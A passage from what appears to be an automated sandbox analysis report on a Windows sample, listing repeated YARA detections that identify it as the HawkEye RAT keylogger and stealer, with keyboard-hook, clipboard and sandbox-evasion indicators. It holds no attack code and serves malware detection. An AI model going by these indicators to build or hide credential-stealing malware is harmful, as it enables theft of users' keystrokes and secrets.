                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, Form1.cs.Net Code: HookKeyboard
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_0040D674 OpenClipboard,GetLastError,DeleteFileW,14_2_0040D674

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.35439a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.62b8e45.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0.2.tDb0ggawON.exe.51cc830.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 11.2.tDb0ggawON.exe.302b2a8.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.298995569.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000002.516368822.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.298155890.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 0000000B.00000000.297537951.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                  Source: 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                  Source: tDb0ggawON.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 11.2.tDb0ggawON.exe.81e0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.8080000.9.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.24.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.17.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.19.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.630ecaa.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.9.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.22.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 0.2.tDb0ggawON.exe.62b7440.6.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.45fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.2.tDb0ggawON.exe.408208.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.45fa72.23.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.2.tDb0ggawON.exe.409c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.7.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.409c0d.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                  Source: 11.0.tDb0ggawON.exe.408208.12.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                  Source: 0.2.tDb0ggawON.exe.50cb610.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
